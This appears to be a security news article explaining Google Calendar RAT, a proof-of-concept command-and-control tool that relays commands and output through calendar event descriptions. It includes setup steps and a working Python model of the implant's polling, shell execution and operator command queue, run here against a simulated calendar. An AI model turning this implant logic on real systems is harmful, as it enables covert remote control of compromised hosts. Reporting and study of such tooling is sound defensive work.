Google Calendar RAT Abusing Calendar Events to Create Red Teaming Infrastructure
Google Calendar RAT (GCR) is a proof of concept for Command & Control (C2) via Google Calendar Events. It’s useful when setting up a full red team infrastructure is challenging.
GCR requires a Gmail account and uses Google Calendar event descriptions as a covert channel, so every connection the implant makes goes directly to Google. Its developer and researcher, Mr. Saighnal (aka Valerio Alessandroni), describes it as a layer 7 (application-layer) covert channel.
When running on a compromised host, GCR periodically polls the calendar event description for new commands, executes them on the target device, and writes the command output back into the event description. Because the implant communicates exclusively through legitimate Google infrastructure, as both the developer and Google's threat report note, defenders have no unusual destination or protocol to flag.
GCR Workflow
The red teaming tool uses Google Calendar events for C2: the operator places commands in the description field of Google Calendar events.
GCR connects to the shared Google Calendar, checks for pending commands, and, if no event exists for the target yet, creates one containing the command “whoami”.
The complete GCR workflow is shown in the image below:
GCR workflow attack diagram (Source: GitHub)
Each event consists of two parts:
The title contains a unique target ID, so multiple commands can be scheduled for the same target under that ID.
The description contains the command to run and its base64-encoded output, separated by “|”.
Because the implant's only network peer is Google's servers, its connections look entirely legitimate from a network standpoint.
How do I use it?
The steps to use it are:
First, create a Google service account, download its credentials.json file, and place it in the script’s directory.
Create a new Google Calendar, share it with the service account, and update the script with the calendar’s address.
When run on the target system, the script automatically creates an event with a distinct target ID and runs the “whoami” command.
Commands placed in the event description must follow this syntax:
=> CLEAR_COMMAND|BASE64_OUTPUT
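The following is an added example, not code from the GCR project, that models the event-description protocol described above end to end: the operator queues a command by creating an event whose description holds only the clear-text command, the implant polls, runs anything without a base64 half, and writes `CLEAR_COMMAND|BASE64_OUTPUT` back. The in-memory `FakeCalendar`, the `Event` class and the fake command executor used in the usage call are constructed stand-ins so it runs offline; the real tool talks to the Google Calendar API through the service-account credentials, which is assumed here but not implemented.

```python
import base64
import subprocess
from dataclasses import dataclass, field

SEP = "|"  # separator between the clear-text command and its base64-encoded output


@dataclass
class Event:
    """Stand-in for a calendar event: title carries the target ID, description the command channel."""
    title: str
    description: str


@dataclass
class FakeCalendar:
    """In-memory stand-in for the shared Google Calendar (constructed for this example, not the API)."""
    events: list = field(default_factory=list)

    def events_for(self, target_id):
        return [e for e in self.events if e.title == target_id]

    def insert(self, target_id, description):
        ev = Event(target_id, description)
        self.events.append(ev)
        return ev


def parse_description(description):
    """Split 'CLEAR_COMMAND|BASE64_OUTPUT' into (command, output).

    output is None while the command is still pending (no '|' or nothing after it).
    The format has no escaping, so the command itself must not contain SEP.
    """
    command, sep, b64 = description.partition(SEP)
    command, b64 = command.strip(), b64.strip()
    if not sep or not b64:
        return command, None
    return command, base64.b64decode(b64).decode("utf-8", errors="replace")


def encode_result(command, output):
    """Build the description the implant writes back after executing a command."""
    encoded = base64.b64encode(output.encode("utf-8")).decode("ascii")
    return f"{command}{SEP}{encoded}"


def run_locally(command):
    """Default executor: run the command through the host shell, as the implant would."""
    proc = subprocess.run(command, shell=True, capture_output=True, text=True)
    return proc.stdout + proc.stderr


def implant_poll(cal, target_id, run=run_locally):
    """One polling iteration of the implant; returns the commands it executed this round."""
    if not cal.events_for(target_id):
        # First contact: register the target with an event that runs "whoami".
        cal.insert(target_id, "whoami")
    executed = []
    for ev in cal.events_for(target_id):
        command, output = parse_description(ev.description)
        if command and output is None:          # pending: no base64 half yet
            ev.description = encode_result(command, run(command))
            executed.append(command)
    return executed


def operator_queue(cal, target_id, command):
    """Operator side: schedule a command by creating an event whose description has no output yet."""
    if SEP in command:
        raise ValueError(f"command must not contain {SEP!r}; the format cannot escape it")
    return cal.insert(target_id, command)


def operator_collect(cal, target_id):
    """Operator side: decode every completed command for a target into {command: output}."""
    results = {}
    for ev in cal.events_for(target_id):
        command, output = parse_description(ev.description)
        if output is not None:
            results[command] = output
    return results


if __name__ == "__main__":
    # Constructed executor so the demo does not touch the host; swap in run_locally for a real run.
    fake_host = {"whoami": "corp\\alice\n", "hostname": "WS-042\n"}
    cal = FakeCalendar()
    print(implant_poll(cal, "target-1", fake_host.__getitem__))   # first poll registers and runs whoami
    operator_queue(cal, "target-1", "hostname")
    print(implant_poll(cal, "target-1", fake_host.__getitem__))   # second poll picks up the queued command
    print(operator_collect(cal, "target-1"))
```

Note the `|` restriction: because the base64 half never contains `|`, the parser can split on the first separator, but that also means a shell pipeline cannot be sent as a single command without a different encoding, which is why `operator_queue` refuses such commands rather than silently truncating them.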
In March 2023, Google TAG observed an Iran-linked APT group using Gmail for C2 with BANANAMAIL, a small .NET backdoor that checks email accounts over IMAP for commands to execute.
GCR has not yet been observed in the wild, but Mandiant has seen multiple threat actors sharing the public proof of concept on underground forums. Google noted in its threat report that interest in abusing cloud services for C2 persists.